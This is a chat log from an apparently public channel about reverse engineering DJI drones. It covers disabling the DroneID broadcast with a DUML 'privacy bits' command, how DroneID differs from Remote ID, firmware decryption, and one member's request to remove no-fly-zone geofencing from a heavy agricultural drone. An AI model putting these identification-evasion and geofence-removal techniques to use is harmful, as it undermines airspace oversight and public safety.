[2022-12-09 15:49:44]
ivar :
ivar joined the channel.
[2022-12-09 23:52:59]
invender :
invender joined the channel.
[2022-12-10 11:05:55]
harryemery92 :
@oxolot
[2022-12-10 11:06:14]
harryemery92 :
And running latest firmware on the mini 3
[2022-12-10 11:13:48]
harryemery92 :
@il1oo0 @oxolot mavic 3 with it running on latest update
[2022-12-10 18:08:19]
nmikus :
Can you verify drone ID is actually disabled? They may just ignore those bits now
[2022-12-10 22:44:56]
harryemery92 :
Needs testing on aeroscope
[2022-12-11 10:46:37]
vpinch4 :
vpinch4 joined the channel.
[2022-12-12 20:06:20]
dereksynkopa :
Unfortunately, this method doesn't work. The problem is due to a connection error via bulk. File "d:\dji-firmware-tools-master\CIAJeepDoors.py", line 260, in
main()
File "d:\dji-firmware-tools-master\CIAJeepDoors.py", line 222, in main
ser = open_usb(po)
File "d:\dji-firmware-tools-master.\comm_serialtalk.py", line 148, in open_usb
import usb.core
ModuleNotFoundError: No module named 'usb'
[2022-12-15 15:10:52]
fredbotton :
fredbotton joined the channel.
[2022-12-15 18:28:41]
pingspike :
can anyone tell me if my understanding is correct as some of the terminology around remote id as a whole is overlapping in my brain
I’m in the UK so we don’t have the whole “Remote ID” thing going on here (yet)
[2022-12-15 18:28:46]
pingspike :
since around 2017 or so (the OG Mavic Pro) all DJI drones have been broadcasting DJI’s proprietary “beacon” (unsure of the correct word to use) that AeroScope can receive and can then reveal the model, serial number, take off co-ords, current position, altitude, etc
[2022-12-15 18:29:01]
pingspike :
that “beacon” message was, and still is, proprietary to DJI
I’ll call it “Drone ID” for this explanation, rather than Remote ID
draw a line there, hold that thought :blush:
[2022-12-15 18:29:37]
pingspike :
now in more recent times, the requirement (from FAA? :shrug: ) is for all drones to broadcast a remote id signal which complies with some open drone id standards
meaning you could retrospectively buy and fit a Remote ID module on an old drone
[2022-12-15 18:29:51]
pingspike :
this remote id signal broadcasts less data, so no drone battery level and other smaller details, but still includes its own serial number
[2022-12-15 18:29:54]
pingspike :
still with me?
[2022-12-15 18:30:03]
pingspike :
my understanding is that all modern DJI drones are still broadcasting their specific fine-details to any AeroScope within range and in recent firmware updates, as we’ve seen with the Avata, are also broadcasting the open remote id protocol in the relevant countries that require it
[2022-12-15 18:30:13]
pingspike :
have I got this right? that there are two protocols? one that only DJI use and another that everyone can/will use?
[2022-12-15 19:05:49]
quad808 :
anyone correct me if I am wrong on this, but yes, I think you are correct. DJI pushed hard for their "Aeroscope-droneid" to be adopted by the FAA, which failed totally. So now they are stuck with this and whatever "permanent" thing the FAA releases. Not sure if they would be granted use of the "Aeroscope-droneid" under a grandfather type exception for their current drones to meet FAA rules going forward. Time will tell.
[2022-12-15 20:26:02]
pingspike :
yeah that was my understanding too, that they are two very different and separate things
[2022-12-15 21:09:13]
sparkyws :
So will ciajeepdoors disable both?
[2022-12-15 22:53:08]
quad808 :
Looking at finding more info....good video here: https://www.youtube.com/watch?v=u2ujNdNgdd4 To check what is compliant for DroneID via FAA: https://uasdoc.faa.gov/listDocs From what I can find, looks like FAA is accepting DJI's Aeroscope-droneID as acceptable. Trying to find out if there is a minimum broadcast wattage for FAA's rule of droneID. @sparkyws ciajeepdoors only disables DJI's Aeroscope-Droneid on firmware that supports disabling.
[2022-12-17 09:32:27]
vit127549 :
vit127549 joined the channel.
[2022-12-18 06:26:20]
chasseur :
chasseur joined the channel.
[2022-12-20 12:33:17]
milenovic :
milenovic joined the channel.
[2022-12-21 08:45:30]
p_m_r_s :
p_m_r_s joined the channel.
[2022-12-21 13:11:44]
freakmonk :
freakmonk joined the channel.
[2022-12-21 19:41:40]
royeiror :
royeiror joined the channel.
[2022-12-21 19:57:05]
dereksynkopa :
As a result of my experiments, I noticed that the Mini 3 pro from the firmware version that I can install, i.e. 1.00.0100, already has Remote ID broadcasting via WIFI. I checked it with the Drone Scanner application. I checked the Remote ID using RM-330 DJIFly 1.9.0 and RC-N1 DJIFLY 1.6.1. Tested under CE and FCC mode in Europe. Same result in both cases. All options in DJIFLY except the required Approximate Location Info were disabled. At the same time, I made a test using mini 2 v.1.3.0000 and here the remote id was unavailable as expected. Unfortunately, DJI is not being honest with users, claiming that remote id is only enabled in the US and Japan for now.
[2022-12-21 21:56:25]
wixadal747 :
wixadal747 joined the channel.
[2022-12-22 10:40:31]
lawesslee :
lawesslee joined the channel.
[2022-12-22 14:38:34]
tissy :
Since DJI have evidently migrated away from Mapbox to MapTiler, I presume that’s why I can no longer get mapping on the Aeroscope CrystalSky. Anyone found a workaround for this please?
[2022-12-24 02:36:50]
claudionc :
claudionc joined the channel.
[2022-12-26 08:27:39]
baxove :
derowey371 joined the channel.
[2022-12-26 20:12:57]
vadims2.mne :
vadims2.mne joined the channel.
[2022-12-27 07:41:34]
mr.twich :
mr.twich joined the channel.
[2022-12-27 10:36:56]
algimantas :
algimantas joined the channel.
[2022-12-27 13:37:11]
elder :
elder joined the channel.
[2022-12-28 02:18:55]
griffo77 :
griffo77 joined the channel.
[2022-12-28 14:48:12]
mavic2reverser :
does anyone here have access to the DJI linux SDK for Aeroscope? Curious to poke at it and can't seem to find it anywhere from my google searching
[2022-12-31 14:40:34]
efwefaf :
efwefaf joined the channel.
[2022-12-31 21:22:22]
trueandfalse :
spartaksm99 joined the channel.
[2023-01-01 16:24:10]
fantom :
fantom joined the channel.
[2023-01-01 16:37:15]
fantom :
but how did you achieve this? Have you used the service firmware, after which you upgraded to 1000? Have you checked that the drone ID is really disabled?
[2023-01-01 17:17:34]
trueandfalse :
@spartaksm99 left the channel.
[2023-01-02 10:12:38]
coldflake :
FWIW, I have 10 Aeroscope Mobile that I need to get rid of.
They are effing expensive but hit me up with a PM if interested
[2023-01-04 05:19:56]
mingtao :
Also have in stock 7 sets of Aeroscope G8 .. if anyone needs it, PM me. Stored in Kuwait or Saudi Arabia
[2023-01-04 06:13:04]
kaleongo :
kaleongo joined the channel.
[2023-01-04 07:25:46]
lebangrev :
lebangrev joined the channel.
[2023-01-04 19:17:38]
gde :
gde joined the channel.
[2023-01-04 22:39:10]
retrocall :
retrocall joined the channel.
[2023-01-05 12:32:36]
papalegba :
How much?
[2023-01-05 12:33:03]
papalegba :
Is there a G9 or higher or is this the latest version? How much?
[2023-01-05 19:39:31]
aprentis :
aprentis joined the channel.
[2023-01-05 19:57:14]
dmtr :
dmtr joined the channel.
[2023-01-06 19:12:18]
johnnokomis :
johnnokomis joined the channel.
[2023-01-06 21:03:07]
mumbling4450 :
mumbling4450 joined the channel.
[2023-01-06 22:37:27]
dabeast1234 :
dabeast1234 joined the channel.
[2023-01-08 17:33:06]
aviationnerd :
aviationnerd joined the channel.
[2023-01-09 14:07:19]
jandersson :
jandersson joined the channel.
[2023-01-11 23:23:59]
sparkyws :
Would a DJI Mini 3 or any other RID enabled drone be transmitting its RID if flown in the UK? or anywhere where RID is not required. Is it geo-based enabled?
[2023-01-12 05:11:51]
the_lord :
I sent you PM, please check
[2023-01-12 17:05:06]
yosa :
yosa joined the channel.
[2023-01-14 19:30:51]
speatuk :
I second this question
[2023-01-14 21:21:51]
tissy :
DJI drones do not transmit the new RID in the UK or other countries where it is not mandated. For DJI, it is geolocation specific. This does not apply to other manufacturers however.
[2023-01-15 20:22:39]
o0raq0o :
o0raq0o joined the channel.
[2023-01-16 17:17:35]
pingspike :
@tissy good to know
do you also know if it would transmit RID if there was no GPS available?
in other words, is RID on by default or off by default? (before geolocation makes the decision to turn it on or off)
[2023-01-16 17:30:05]
loaderbull :
I have a feeling it is off by default until sat lock ping, but i can’t verify this.
[2023-01-16 17:44:02]
tissy :
I believe it only starts to transmit once a GPS lock has been acquired. I will try and clarify. I’m in the UK, so not easy to do off the bat.
[2023-01-16 17:51:43]
pingspike :
hi from Wigan
[2023-01-16 17:52:27]
pingspike :
we could probably check with some tinfoil?
[2023-01-17 09:04:53]
agaff :
agaff joined the channel.
[2023-01-19 13:01:39]
ginostred :
ginostred joined the channel.
[2023-01-19 14:10:49]
sicivo3584 :
sicivo3584 joined the channel.
[2023-01-20 15:15:06]
kruk :
kruk joined the channel.
[2023-01-22 14:20:51]
dienox :
dienox joined the channel.
[2023-01-22 20:40:51]
jglx3p :
jglx3p joined the channel.
[2023-01-25 13:08:24]
skhemnik :
skhemnik joined the channel.
[2023-01-25 16:14:46]
m4x :
m4x joined the channel.
[2023-01-25 16:14:52]
pomsta :
pomsta joined the channel.
[2023-01-25 16:15:10]
pingspike :
welcome
[2023-01-25 16:15:16]
pomsta :
Thanks guys
[2023-01-25 16:29:03]
wag-on :
mcht joined the channel.
[2023-01-26 05:28:52]
kirat :
kirat joined the channel.
[2023-01-26 07:01:23]
polyanich :
polyanich joined the channel.
[2023-01-26 08:35:08]
haizeiwang :
haizeiwang joined the channel.
[2023-01-26 09:16:22]
eddy :
Hi boys. After a long time, DroneID (CIA .. ) reactivated itself on Mini2. I still use it the same way, I can't find a causal connection why it happened. I always use the same apk version on a dedicated device isolated from the internet. I still don't know if it was caused by the apk or the drone itself. Did you happen to find a possible reason somewhere in the code? (Time dependency or something else) I know that you can't rely 100% on turning off DroneID, but I'm angry that I can't find the reason.
[2023-01-26 13:25:54]
konraditurbe :
Maybe there's a daemon that restarts it after N time has passed. I always plug the drone before heading out to check it's disabled.
[2023-01-26 14:38:00]
tmbinc :
On Mini2 it's a flag that's stored in the FC's trusted storage, so I think FC itself wouldn't set it back.
[2023-01-26 14:38:14]
tmbinc :
Obviously any other component (incl. app) can send an update to re-enable it.
[2023-01-26 15:02:38]
gareb :
gareb joined the channel.
[2023-01-26 15:34:00]
eddy :
Thanks for the information. I had a thought that I added to the drone-hacks forum. Maybe it would be a simplification to start another application before each start.
[2023-01-26 21:56:44]
maxdnsff :
maxdnsff joined the channel.
[2023-01-27 17:32:16]
eddy :
I'll answer myself: in my case, Litchi is responsible for the spontaneous reactivation of Drone ID. Since I use it only a little, it took me a lot of testing. Specifically it is now version v.4.26.2-g. Be alert.
[2023-01-27 17:35:10]
baxove :
That's correct. I've noticed that too. Older versions of Litchi did not reactivate DroneID.
[2023-01-27 17:41:43]
tmbinc :
Oh, interesting. I assume since Litchi uses the SDK it's not something intentional of Litchi.
[2023-01-28 13:46:49]
lokidokister :
lokidokister joined the channel.
[2023-01-28 18:48:22]
clanc :
clanc joined the channel.
[2023-01-29 07:27:46]
david.haluska :
david.haluska joined the channel.
[2023-01-29 08:37:55]
accountfrompl :
accountfrompl joined the channel.
[2023-01-29 23:07:32]
sebo212212 :
sebo212212 joined the channel.
[2023-01-30 13:54:03]
oathk33p3r :
oathk33p3r joined the channel.
[2023-01-31 05:52:08]
xshl5 :
xshl5 joined the channel.
[2023-01-31 06:10:34]
jackma :
wjydji2022 joined the channel.
[2023-01-31 11:45:06]
zuchmir :
zuchmir joined the channel.
[2023-02-01 08:24:30]
ginostred :
Hi everyone, I'm figuring out lightbridge droneID RF characteristics on my Phantom 4 Pro. Unlike ocusync, there are no droneid packets hopping within specific frequency channels, so the droneid has to be embedded in the downlink signal, which AFAIK is encrypted. So, does this mean that the droneID data actually has some sort of protection in lightbridge? Then how is it possible for the Aeroscope to retrieve the data?
[2023-02-01 11:11:38]
sistor :
sistor joined the channel.
[2023-02-01 12:42:28]
enigma2 :
It's not encrypted.
[2023-02-01 13:56:44]
ginostred :
So it's theoretically possible to sniff the lightbridge video downlink?
[2023-02-02 04:08:08]
pagrei :
pagrei joined the channel.
[2023-02-02 06:35:48]
nikoman :
nikoman joined the channel.
[2023-02-03 03:32:46]
caspar :
caspar joined the channel.
[2023-02-03 03:35:49]
zdsam :
zdsam joined the channel.
[2023-02-04 10:57:55]
eseven :
It does not use the same channels/freqs...
[2023-02-06 10:50:05]
ginostred :
What frequencies does it use? I couldn't find any other signals transmitted by the drone in the 2.4/5.8 GHz bands
[2023-02-06 15:32:06]
fedosgad :
fedosgad joined the channel.
[2023-02-06 22:22:28]
ondrbal :
ondrbal joined the channel.
[2023-02-12 09:01:15]
dmtstarpilot :
Does jeepdoors remove the dji mavic 2 zoom serial number from being seen on aeroscope?
[2023-02-12 12:40:26]
skynet :
Now I'm deep into reversing the fw & hw of the DJI Agras T40 (ag601) drone.
I’ve got China-locked version of this bird.
What I want:
* unlock it from China - to become universal
* unlock NFZ (generate certificate)
* disable DroneID
What I’ve already done:
* dumped eMMC card partitions (using EasyJTAG)
* did some IDA reversing of their software.
* Modified test_dji_imah_fwsig_rebin1.sh to unpack its firmware (wm170|wm231|wm232|gl170|pm430|ag500|ag501|ag601|pm320) so it uses the PRAK-2020-01 UFIE-2020-04 TBIE-2020-02 keys, but no luck unpacking rtos.img
Sys info:
Device Name A: full_e1e_ag601
Device Name B: e1e_ag601
Device Board Name: evb2
Architecture ABI: armeabi-v7a
Device Platform: e1e
Product ID: e1e_ag601
Build Description: full_e1e_ag601-userdebug 6.0 MDB08M 276 test-keys
EMMC RPMB is programmed and written 36 times
Kernel: console=ttyS0,921600 mem=2048M vmalloc=504M user_debug=255 earlyprintk clk_ignore_unused maxcpus=3 firmware_class.path=/system/lib/modules/imgtec uio_pdrv_genirq.of_id=generic-uio kmemleak=off androidboot.hardware=e1e spidev.bufsiz=8192 mp_state=production print-fatal-signals coherent_pool=0x400000 chip_sn=2015x0000000000000 board_sn=XXXXX0000000X0 production_sn=0000F000F000F00000X0 security=selinux androidboot.selinux=enforcing androidboot.slot_suffix=1 androidboot.android_dt_dir=/proc/device-tree/firmware_a/android/ androidboot.hw_version=00.01.00.00 androidboot.cpu_role=slave rtos_int=70,142,106,107,108,110,165,227,229,230, androidboot.verity=1 androidboot.secure_debug=0
AG601 has FC based on H6 V100 pv7k88.00S-1 Chip with E1E_DEBUG & MCU_DEBUG ports on board.
Now stuck where to dig deeper…
Now I would like to derive the RSA keys to unpack: Trusted Applications (there are 5 *.ta in total), rtos.img
The ways I see as for now:
* DMA Attack to dump all DDR4 ram and reverse unpacked OP-TEE RTOS
* reset the RPMB Key and dig into RPMB partition
* brute-force RSA keys))
Any suggestions?
[2023-02-12 16:19:22]
tmbinc :
Firmware is encrypted with TBIE (symmetric), not RSA
[2023-02-12 16:19:32]
tmbinc :
What's the deal with these chinese-only T40?
[2023-02-12 16:20:54]
tmbinc :
Also as much as I'd like to help, I'm out when we're talking publicly about un-geofencing drones that can carry 40kg, sorry :/
[2023-02-12 18:32:24]
skynet :
OP-TEE software (FC, etc.) is encrypted with a pre-programmed RSA key.
[2023-02-12 18:32:55]
skynet :
It doesn't matter Global or China version for this task.
[2023-02-12 18:33:22]
skynet :
We can talk PM. Btw, it carries 50kg.
[2023-02-12 18:54:46]
tmbinc :
Firmware is _verified_ by the RSA key (of which a hash is blown into fuses), but it's _decrypted_ with a key that's derived from the cust_key ("key 6") -> TBIE
[2023-02-12 19:12:20]
skynet :
Inside the firmware (symmetrically encrypted with the TBIE key) is an image of the RTOS OP-TEE part of the software, which is additionally encrypted with an RSA key. RTFM ARM TZ OP-TEE. The RSA private key is embedded into the chipset at the factory.
[2023-02-12 22:00:10]
whisper :
whisper joined the channel.
[2023-02-13 12:06:53]
gilroy34 :
gilroy34 joined the channel.
[2023-02-13 14:21:02]
longjohndroid :
longjohndroid joined the channel.
[2023-02-13 23:29:48]
hardaqa :
hardaqa joined the channel.
[2023-02-14 15:20:33]
cds :
cds joined the channel.
[2023-02-14 16:20:22]
balamacab :
balamacab joined the channel.
[2023-02-15 03:00:19]
ahai :
ahai joined the channel.
[2023-02-16 17:32:01]
markjw :
markjw joined the channel.
[2023-02-17 05:28:12]
ramzet :
ramzet joined the channel.
[2023-02-17 16:45:19]
oxolot :
Does anybody remember which command was used to change the privacy bits on the Phantom 3? The usual 218 - 05 does not work there
[2023-02-17 18:54:57]
ramzet :
Gentlemen, in the process of trying to reset the drone ID, I encountered a problem with command 218; my drone responds to me like this: 55 0f 04 a2 03 0a 00 00 80 03 da 05 00 b8 d9. Who can tell me what it is trying to tell me?
[2023-02-17 19:14:45]
bitbangingbytes :
Heard rumors of an AeroScope V2 coming out soon, anyone else heard that?
[2023-02-17 19:41:36]
oxolot :
Nothing. Only that it heard you. You will always get the same answer regardless of what your privacy bits are
[2023-02-18 00:12:53]
asdqwe :
asdqwe joined the channel.
[2023-02-18 06:16:43]
ramzet :
And that's not quite the command ( --bulk -a 2 -t 1000 -r 0300 -s3 -i 218 -x 0800000000 ). It responded like this (55 23 04 2e 03 0a 00 00 80 03 da 08 00 13 63 6f 6d 2e 64 6a 69 2e 69 6e 64 75 73 74 72 79 2e 70 69 e6 3a)
[2023-02-18 06:26:05]
ramzet :
It definitely communicates with me, but I don't understand what ( --bulk -a 2 -t 1000 -r 0300 -s3 -i 218 -x 0b00000000
55 97 04 17 03 0a 00 00 80 03 da 0b 00 05 e7 07 02 11 0a 3b 20 13 63 6f 6d 2e 64 6a 69 2e 69 6e 64 75 73 74 72 79 2e 70 69 e7 07 02 11 0a 20 01 13 57 49 4e 5f 53 44 4b 5f 44 45 46 41 55 4c 54 5f 55 49 44 e7 07 02 09 16 1b 0f 13 57 49 4e 5f 53 44 4b 5f 44 45 46 41 55 4c 54 5f 55 49 44 e7 07 02 07 07 38 37 13 63 6f 6d 2e 64 6a 69 2e 69 6e 64 75 73 74 72 79 2e 70 69 e7 07 02 05 13 16 25 13 63 6f 6d 2e 64 6a 69 2e 69 6e 64 75 73 74 72 79 2e 70 69 e4 40)
[2023-02-18 07:29:11]
oxolot :
Try Hex to ASCII conversion and the mystery will be solved :)
[2023-02-18 12:27:17]
pingspike :
It would make sense, @bitbangingbytes, as the old Mobile model has been end of life for a while now
[2023-02-18 15:26:22]
tissy :
Hopefully it'll be an open protocol that the drone transmits which can then easily be integrated into existing CUAS systems without having to use the specific current Aeroscope hardware.
[2023-02-19 04:56:24]
helpmetom :
helpmetom joined the channel.
[2023-02-19 14:13:21]
bombo :
bombo joined the channel.
[2023-02-19 19:54:25]
crazyfluffypony :
crazyfluffypony joined the channel.
[2023-02-20 15:54:59]
dkovar :
Most of the CUAS systems do decode DroneID packets already. They're also adding the U.S. RemoteID.
[2023-02-20 17:55:05]
gudvin :
gudvin joined the channel.
[2023-02-20 23:17:15]
bitbangingbytes :
Any CUAS systems you are aware of by name that currently decode DroneID without the use of an AeroScope?
[2023-02-21 03:07:46]
nmikus :
I thought wrt DJI that DroneID/Aeroscope was just RemoteID compliant. So in the US DroneID==RemoteID... is that not the case?
[2023-02-21 05:31:53]
joh :
joh joined the channel.
[2023-02-21 06:06:32]
gudvin :
Please help me with CIA Jeepdoors-Gui.py. I installed the pyusb and libusb libraries, copied the file to the directory with dji-firmware-tools. The script is running. However, when the application is launched and the connect button is pressed, the program closes. How can I use libusb0.dll? How do I connect it correctly?
[2023-02-21 11:41:19]
iosav :
iosav joined the channel.
[2023-02-21 15:29:03]
dkovar :
My recollection is that DJI proposed DroneID as a possible RemoteID standard but that they are fundamentally different.
DJI's RemoteID implementation should be transmitting data common to both but via different mechanisms. The common RemoteID medium is Bluetooth.
[2023-02-22 02:52:12]
kylebamboo :
kylebamboo joined the channel.
[2023-02-23 04:25:36]
nmikus :
Bluetooth? I thought that was only for short-range transmission....
[2023-02-23 09:11:03]
valakas :
valakas joined the channel.
[2023-02-23 20:33:24]
dkovar :
A RemoteID provider in the U.S. is getting rather long ranges using Bluetooth in open spaces.
[2023-02-24 04:45:54]
nmikus :
what is long?
[2023-02-24 05:22:07]
ibndias :
ibndias joined the channel.
[2023-02-24 14:22:20]
sinco :
sinco joined the channel.
[2023-02-24 16:25:29]
dkovar :
Over a kilometer in some cases.
[2023-02-24 19:59:47]
skull14541 :
skull14541 joined the channel.
[2023-02-27 08:02:05]
newmanhero :
newmanhero joined the channel.
[2023-03-02 21:51:25]
aholtzma :
Some very nice work here by SysSec - https://github.com/RUB-SysSec/DroneSecurity
[2023-03-02 22:27:41]
dkovar :
Wired article describing some of the context:
https://www.wired.com/story/dji-droneid-operator-location-hacker-tool/
[2023-03-04 03:11:49]
bitbangingbytes :
Actually working on getting that running now with an SDR, seems it needs a bit of TLC to make it work with live data
[2023-03-04 07:01:44]
efwefaf :
[2023-03-04 07:31:35]
leatherman1 :
leatherman1 joined the channel.
[2023-03-04 16:25:02]
i9029 :
i9029 joined the channel.
[2023-03-04 17:20:02]
gudvin :
Friend, where can I get this parser?
[2023-03-04 21:14:50]
faquaral :
faquaral joined the channel.
[2023-03-05 11:21:02]
areoc :
https://b3yond.d3vl.com/duml/
[2023-03-05 12:27:02]
efwefaf :
Can anyone use this to unlock the DJI T40 battery and modify the number of cycles
[2023-03-06 22:26:40]
flylusive_pat :
trb_pat joined the channel.
[2023-03-06 22:54:36]
kateonki :
kateonki joined the channel.
[2023-03-07 15:12:48]
mud :
mud joined the channel.
[2023-03-07 15:27:55]
carrels_entails.0e :
carrels_entails.0e joined the channel.
[2023-03-08 04:39:00]
ololosha :
ololosha joined the channel.
[2023-03-08 08:15:10]
papalegba :
Also, I'm told you cannot use BladeRF since they are using a library that requires Ettus devices.
[2023-03-08 13:18:29]
bitbangingbytes :
Yeah, I've been studying their implementation. It's not overly complex how they gather samples for processing, so I think it can be modified to use other SDRs or perhaps turned into a GNU Radio implementation
[2023-03-09 17:24:20]
pkytwotwo :
pkytwotwo joined the channel.
[2023-03-10 07:16:30]
papalegba :
There's also the proto11 implementation that precedes this one.
[2023-03-10 14:58:54]
dkovar :
Anyone know of a RemoteID -receiver- application for ESP32 such as LilyGo's TBeams?
[2023-03-10 22:21:23]
sparkyws :
These are selling a lilygo t-display-s3 that runs RID
https://www.milehighdroneservices.com/remoteId.php
[2023-03-11 03:36:04]
dkovar :
Thank you. Talking with them now.
[2023-03-11 04:06:43]
bitbangingbytes :
I've used those, pretty good with an external antenna
[2023-03-11 12:42:02]
dkovar :
I love those boards.
[2023-03-11 18:05:41]
bopoh :
bopoh joined the channel.
[2023-03-12 07:55:16]
mingtao :
anyone need G8 - I have a few sets in Dubai, 100k$
[2023-03-12 08:32:24]
papalegba :
I thought they cost about $5k for mobile and $25k for stationary
[2023-03-12 08:40:31]
mingtao :
I also thought so ) but ...
[2023-03-12 09:53:34]
azerbaijan :
Russian economy... You didn't understand...
[2023-03-12 12:55:46]
mingtao :
[2023-03-12 14:58:36]
papalegba :
You can ask but it doesn't mean you are gonna get it ?
[2023-03-12 23:59:06]
bitbangingbytes :
It'll be a good scam for a while I'm sure
[2023-03-14 13:54:58]
stanlu :
stanlu joined the channel.
[2023-03-14 19:20:55]
anghammarad :
anghammarad joined the channel.
[2023-03-14 20:53:40]
andris8888 :
@andris8888 left the channel.
[2023-03-14 23:19:21]
syska :
syska joined the channel.
[2023-03-17 03:03:29]
moyditumla :
moyditumla joined the channel.
[2023-03-21 11:19:45]
papalegba :
Does anybody know where in the firmware the broadcast of the drone id is happening? That is, where the coordinates of the drone, RC and homepoint are being sent out? I'm working with the M3 and M3E/T.
[2023-03-21 14:10:44]
nmikus :
It's created in the FC
[2023-03-21 14:28:35]
papalegba :
Where and how do you know? Because I can find the get/set drone id handler but can't find the place where it's "created".
[2023-03-21 14:29:11]
tmbinc :
It's a "report", similar to the OSD data etc. reports.
[2023-03-21 14:30:02]
tmbinc :
Easiest way to find it is probably to follow the "privacy bits", i.e. what CIAJeepDoors (tries to) write
[2023-03-21 14:30:18]
tmbinc :
(Even though the functionality is done/crippled I think the privacy bits are still tracked)
[2023-03-21 14:30:58]
tmbinc :
Or yeah, the uuid or flight reason or something would work equally
[2023-03-21 14:31:28]
papalegba :
@tmbinc I'll dig in further but it didn't look like anything else was using those bits which is why I'm asking. I mean, the privacy bits.
[2023-03-21 14:32:53]
papalegba :
It's quite possible that I haven't mapped all of the code yet, although I'm pretty sure I mapped most of it.
[2023-03-21 14:33:00]
papalegba :
What are these reports?
[2023-03-21 14:39:20]
tmbinc :
OSD report is pushed to the app that contains all the data the app keeps displaying
[2023-03-21 14:39:24]
tmbinc :
like speeds, position, ...
[2023-03-21 14:39:55]
papalegba :
Haven't found these either. Not yet, anyway.
[2023-03-21 15:29:07]
nmikus :
I have looked at various flight controllers, and found where drone id structures are populated, then passed up to userspace, then down into the modem/dsp. You are looking @ the m3 FC?
[2023-03-21 15:29:49]
papalegba :
M3E at the moment. I do have the M3 FC but haven't reversed it yet.
[2023-03-21 15:31:57]
nmikus :
I haven't looked @ the M3E but I assume it's a similar setup
[2023-03-21 15:39:59]
papalegba :
Where in the M3 FC then?
[2023-03-21 16:12:45]
chinanumberone :
chinanumberone joined the channel.
[2023-03-22 03:39:28]
nmikus :
don't have it in front of me atm but I remember it being some callback nonsense so ghidra/ida may not auto detect it as code
[2023-03-22 06:09:34]
coldflake :
Did you get through the 2nd layer encryption?
[2023-03-22 09:01:50]
papalegba :
I will keep looking. Please ping if you remember more about it.
[2023-03-22 21:52:10]
shuke :
Why does it seem impossible to enable the 32 channels on the Phantom 3A in mainland China? Seeking an explanation, thanks
[2023-03-22 21:59:47]
shuke :
How can I boost the signal on the DJI Phantom 3A?
[2023-03-23 04:42:56]
papalegba :
@shuke For beginners, I would write in English
[2023-03-23 07:12:57]
coldflake :
For the Phantom 3... if I got the translation right, there are no boost hacks because they target OcuSync and not Lightbridge.
No one really cared to capture the packet which sets FCC mode for Lightbridge, but if you do that, it can be done.
[2023-03-23 11:42:22]
chinanumberone :
Did someone manage to get an adb shell on the Mavic 3?
[2023-03-23 11:55:57]
cs2000 :
Nothing for MP3 is public currently AFAIK
[2023-03-23 14:41:17]
chinanumberone :
maybe there are people who can not share much information? :sweat_smile:
[2023-03-23 16:20:31]
dronez4u :
dronez4u joined the channel.
[2023-03-24 16:32:07]
cs2000 :
Yes of course there are! There are always DJI spies watching & other reasons too
[2023-03-24 17:24:13]
efimato_re :
efimato_re joined the channel.
[2023-03-24 17:36:50]
efimato_re :
what's the deal with dji-spies?
[2023-03-24 22:57:59]
cs2000 :
!DJI
[2023-03-24 22:58:00]
dji-rev-bot :
The monstrous DJI eye turns to face you....
[2023-03-24 22:58:16]
cs2000 :
They're **always** watching
[2023-03-27 19:26:44]
kennyx :
kennyx joined the channel.
[2023-03-28 16:32:47]
tmbinc :
Can someone remind me, are there fixed frequencies for DroneID or are they "all over the place"? I know Aeroscope has 4x receivers but is that necessary?
(And yes I feel bad for not knowing the answer myself.)
[2023-03-28 16:33:18]
papalegba :
They need to be scanned for, within a range.
[2023-03-28 16:33:44]
tmbinc :
But how large is that range?
[2023-03-28 16:41:37]
papalegba :
Take a look here https://github.com/RUB-SysSec/DroneSecurity
[2023-03-28 16:44:31]
papalegba :
Also here https://github.com/proto17/dji_droneid/
[2023-03-28 17:00:16]
tmbinc :
I'm aware of both, but is it truly not possible to constrain these more?
[2023-03-28 17:00:21]
tmbinc :
(The frequency ranges)
[2023-03-28 17:38:28]
papalegba :
Not that I know. Plus, the repos are really fudging their scan.
[2023-03-29 02:27:01]
enigma2 :
In LB it's in the DL, so at least 8 channels, and some constant frequency centers are for OC (not related to DL). Meanwhile you don't know whether the drone is in 2.4 or 5.8, so you must have both simultaneously (2x), and lots of centers in one band for each protocol (again 2x) = 4x.
You can't force the drone pilot to work in a specific band or frequency.
DJI had ordered a great number of radio chips for the drones before (LC1860C/AR8001).
Using them in the Aero has no cost for them!
[2023-03-29 06:24:18]
oxolot :
People say that DroneID is transmitted only at 2.4, even if you are operating the drone at 5.8. Not true?
[2023-03-29 20:13:27]
eseven :
Not true. The drone sends DroneID randomly using 2.4 and 5.x GHz. At each channel, it sends 13 bursts and then changes to another channel. It used to spend about 30s at each band...
[2023-03-31 22:15:37]
top7chip :
top7chip joined the channel.
[2023-04-01 16:14:13]
eug3nix :
eug3nix joined the channel.
[2023-04-02 21:44:48]
tacticaltot :
tacticaltot joined the channel.
[2023-04-04 14:21:05]
brillio :
brillio joined the channel.
[2023-04-05 08:26:41]
the_lord :
https://dji-rev.com/dji-rev/pl/a1cdaxeqppda5qpgurpudb9tma
[2023-04-05 09:46:57]
tmbinc :
Thanks! So I'm also seeing the "13x and then it switches freq" (though I can't track all frequencies with my setup here).
[2023-04-05 09:49:52]
papalegba :
What's your setup? Do you have a BladeRF XA9?
[2023-04-05 09:50:55]
tmbinc :
Currently it's a PlutoSDR with MaiaSDR installed, my other setup is a Frankenstein'ed Keysight EXM E6640A (but meh it's effort to bring it up)
[2023-04-05 10:32:18]
tmbinc :
I think it's this table:
[2023-04-05 10:33:53]
tmbinc :
(This firmware may not support 5.7GHz band) - nevermind, just has a more limited set
[2023-04-05 12:27:21]
tmbinc :
I think these frequencies are actually the "initial channel list" where the remote also starts scanning
[2023-04-05 12:30:04]
tmbinc :
Oh nevermind, that's another list:
[2023-04-05 12:32:55]
papalegba :
What firmware is this?
[2023-04-05 12:32:55]
papalegba :
Is this the FC? Which drone and what firmware version?
[2023-04-05 13:02:43]
eseven :
Are these real freqs? Do you know the relation between channel and freq?
The first list seems plausible by freq distance, but the channel jumping is not sequential.
Do you see if there is a jump pattern there?
[2023-04-05 16:17:05]
tmbinc :
These are "physical channel numbers" (I call them that, not sure what the proper name is). 1001..1083 are 2400..2482 MHz, and 2539...2663 are 5725..5849 MHz
[2023-04-05 16:17:10]
tmbinc :
(I hope I'm not confused)
[2023-04-05 16:17:19]
tmbinc :
the jumping pattern indeed follows a scrambling code
[2023-04-05 16:18:40]
tmbinc :
there's a 32-entry hopping table, generated by a goldcode
[2023-04-05 16:18:51]
tmbinc :
but I fail to see where the seed comes from
[2023-04-05 16:19:34]
tmbinc :
It then takes the low 2 bits (if 2.4GHz only) or low 3 bits (if dualband) and indexes the dronid_freq_table
[2023-04-05 16:19:48]
tmbinc :
I.e. essentially it's a 32-cycle
[2023-04-05 16:22:22]
tmbinc :
I _think_ it uses a seed that's similar to the .. uplink(?) .. seed, but generated in a very different way
[2023-04-05 21:54:52]
aholtzma :
